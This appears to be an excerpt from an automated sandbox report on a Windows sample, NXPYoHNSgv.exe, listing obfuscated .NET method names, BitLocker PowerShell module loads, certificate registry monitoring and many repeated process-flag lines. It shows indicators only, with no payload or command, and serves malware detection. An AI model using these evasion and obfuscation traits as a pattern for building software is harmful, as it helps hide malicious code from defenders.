Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, KEObGFMDeIOfWIcUYG.cs High entropy of concatenated method names: 'Q271Sgqyyc', 'OAS1KfimiV', 'kvm1tAQUCy', 'LcZ1hdaoWr', 'TWr14wMVwF', 'L1A1F9iSbS', 'qxd15ilv5j', 'yb31ltvbKN', 'v0n1repiVH', 'ChU19XaMFA'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, RVlDSAOxRVyxPMKF9i.cs High entropy of concatenated method names: 'QVQ6sRo4Qc', 'uP86gZ5IM0', 'Nek6RGR836', 'tRV6kZMrP2', 'uGb6X81rUj', 'Mfp6jsEgaJ', 'nqT6ijfA2J', 'Ajt6ObMokK', 'uwL6w8sKxi', 'w7L6cSV64g'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, NwjUkYRhiPbBYX4Oni.cs High entropy of concatenated method names: 'Dispose', 'k7fWbFH3tU', 'TLVChmiNFA', 'CNwHHBhxLj', 'sTKWEDA4WR', 'kyhWzeC6jd', 'ProcessDialogKey', 'MCiCQMlxVD', 'tOMCW3J9pV', 'SltCCXZn5Q'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, AMpeOLxWWVXed15Rjv.cs High entropy of concatenated method names: 'ToString', 'GnFo98CTIf', 'D4OohJv35X', 'uBnoev1iYR', 'AA4o4VGt2c', 'eesoFGMfIp', 'znooAqJKNB', 'rVLo5GqGLq', 'Os8ol5utK6', 'X7xoDs7Wpo'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, LUP0OQ4ibQ0iEvSMlh.cs High entropy of concatenated method names: 'TdQjq5py2r', 'T1MjdZAPff', 'cwjjB4j1uP', 'eEUjmVpCVu', 'LMejJSWTp8', 'K6yjaDgKkG', 'DZBjKAPcZ7', 'NcAjpYY9WC', 'txX0Rw35lvPAMqr24r0', 'NyiBH93E93eC8ZXvQFU'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, TYUqd0pPkDFMPFLRHL.cs High entropy of concatenated method names: 'zu7XTICENi', 'gsSXaGY7FX', 'iZpkeOxKos', 'yhok4rZvol', 'c3XkFCArMK', 'McukAFM9U4', 'B20k5y9Cef', 'E7CklAcGJu', 'gcnkDNP8VL', 'z3nkrjZN7v'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, f36uE85AbUbcp2P0xd.cs High entropy of concatenated method names: 'RJeigbUcQD', 'a1cikJwjQq', 'BBMijQI2iF', 'mM3jEcEjZx', 'nDZjzD4ZTF', 'cSSiQbWWZ2', 'PwJiWldnak', 'EhUiC1qERZ', 'hC4i6r77xl', 'MT4iIhoiXV'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, cBr4uhCU8o8Cy8bf2T.cs High entropy of concatenated method names: 'JeBBW5rd2', 'MOymKCdeX', 'zR4Jx94S7', 'pJiaDlK4S', 'TQCKI5NrF', 'Mkdp37s2o', 'IOyRnxIsDk27LLXGn6', 'XU6wGd0pmf26TO5B2D', 'p1yZyAmBr', 'BH7PxsCGs'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, o1d9gStgXVOlEGar3e.cs High entropy of concatenated method names: 'psfjshgaOZ', 'PFYjRg07HF', 'SXyjX4gAoo', 'Gp1jiAN9cL', 'wy4jOtUQd7', 'aEBXyONbN6', 'oCDXVneKMq', 'nyUXNU4Yl0', 'fB3XvmXyoB', 'd94Xbsl0id'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, aRwY22Vs0Gal2sm3Ao.cs High entropy of concatenated method names: 'TPrnvJuTsx', 'op2nEThVt7', 'IYAZQ4tOfN', 'LFjZWHVurs', 'Tphn9oysW6', 'k6rn3UBhJG', 'tKBnMFFRuo', 'P0MnYCptpn', 'DpInH0D0x5', 'KYEnxQIvYY'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, D1Xaa2kb4p1B4Tw15W.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'yAQCb5hS6l', 'KtkCEsYuXR', 'xqhCzuZ1Ql', 'X276QJQ4vB', 'x6L6WxhikG', 'oKs6CL6Pr3', 'vFq665xxKp', 'TlC7eQJB2GuLdeLo0N2'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, NSqt8wWQ2RrVNunr9qC.cs High entropy of concatenated method names: 'nYEUdGWIq0', 'QBbU02dcqB', 'FSaUB5gTCS', 'o3AUm5fhFY', 'JvWUTPN1m9', 'NV5UJGasKL', 'OgcUafgMNi', 'w27USQjrtN', 'ICIUKCCXWb', 'T5gUppjTGq'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, jMlxVDb7OM3J9pVxlt.cs High entropy of concatenated method names: 'c07Zt3UlHb', 's9nZhetuqX', 'vRhZegZWNK', 'FJJZ4Q23r9', 'TpoZYL4AJL', 'yOTZFb1Y6G', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, XGFAS78spoJBcDbmwR.cs High entropy of concatenated method names: 'eUAncETVhn', 'XIqnfpNKR3', 'ToString', 'Ea5ng0KJTp', 'dcFnRNOhKT', 'NYKnkGfEKK', 'SBpnXvHPlm', 'VuLnjZNbLt', 'xSRnicmMpX', 'aDZnOes3Km'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, hZn5QLEbNAmkl46PVu.cs High entropy of concatenated method names: 'Ap5UWwR1DB', 'QDiU6KvI8f', 'Hj2UI0cbvV', 'EZsUgkj0Aj', 'umTURv1YN4', 'xfRUX5PDou', 'd9xUjuh4tY', 'wu4ZN974W5', 'YSAZvNCPUY', 'p7JZb3Jne5'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, BKDA4WvROyheC6jdlC.cs High entropy of concatenated method names: 'f2EZgn1cgf', 'DqGZRHaKAV', 'jSAZkC5g5q', 'zG7ZXPRlIp', 'CRnZj1oYxD', 'W9pZiVZYE8', 'WZvZOG1gB9', 'AbxZwqUr2T', 'MBhZcrKONf', 'MGmZfc7c17'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, EI9VY7W6CndmTPHTju9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QqNPYCkFgg', 'dalPHWhknr', 'wdxPxvmUnB', 'obxP8dpaip', 'xghPyK1lu7', 'IyFPV1lyh7', 'rfRPNNwl9q'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, IFqjIiKhx4dgIGrjAv.cs High entropy of concatenated method names: 'D2Ykmppgjp', 'Re2kJJW8wl', 'KJVkSBGIi8', 'LNIkKmHFIG', 'tBFkLPAjdt', 'ohkkoDDOsm', 'HDDknhqQLu', 'EJ2kZE83ru', 'cECkUCQTun', 'yCIkPGEYEO'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, yEojYxIQkDkYwMfXZl.cs High entropy of concatenated method names: 'upQWiLPFeb', 'XotWO9WYKQ', 'jhxWc4dgIG', 'NjAWfv8YUq', 'JLRWLHLL1d', 'OgSWogXVOl', 'a2qVSbW86td4nghNCJ', 'DUuROCT55Lrxg3pOmD', 'HqwWWgEo8F', 'CDeW6PfT3T'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, aLPFebSbot9WYKQxSZ.cs High entropy of concatenated method names: 'ECYRYrbR3j', 'FyoRH847w5', 'lAlRx8eKw5', 'aHpR8E7qi1', 'qrFRyCeIST', 'AjORVb66IE', 'fHARNnL469', 'W2NRvKNhvn', 'ei4Rbw51s8', 'CftREyLudR'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, G1Nsw9DieHrvsA5hvT.cs High entropy of concatenated method names: 'wkuidIT7h1', 'ypli0o453a', 'OwfiBg8Cd6', 'F9wimfX4Ie', 'Qc6iTCjfkK', 'KeQiJpt9dl', 'fobiakKxQ2', 'MhOiShl1DS', 'xYLiKf8OsK', 'BQTippNqyK'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, KEObGFMDeIOfWIcUYG.cs High entropy of concatenated method names: 'Q271Sgqyyc', 'OAS1KfimiV', 'kvm1tAQUCy', 'LcZ1hdaoWr', 'TWr14wMVwF', 'L1A1F9iSbS', 'qxd15ilv5j', 'yb31ltvbKN', 'v0n1repiVH', 'ChU19XaMFA'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, RVlDSAOxRVyxPMKF9i.cs High entropy of concatenated method names: 'QVQ6sRo4Qc', 'uP86gZ5IM0', 'Nek6RGR836', 'tRV6kZMrP2', 'uGb6X81rUj', 'Mfp6jsEgaJ', 'nqT6ijfA2J', 'Ajt6ObMokK', 'uwL6w8sKxi', 'w7L6cSV64g'

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
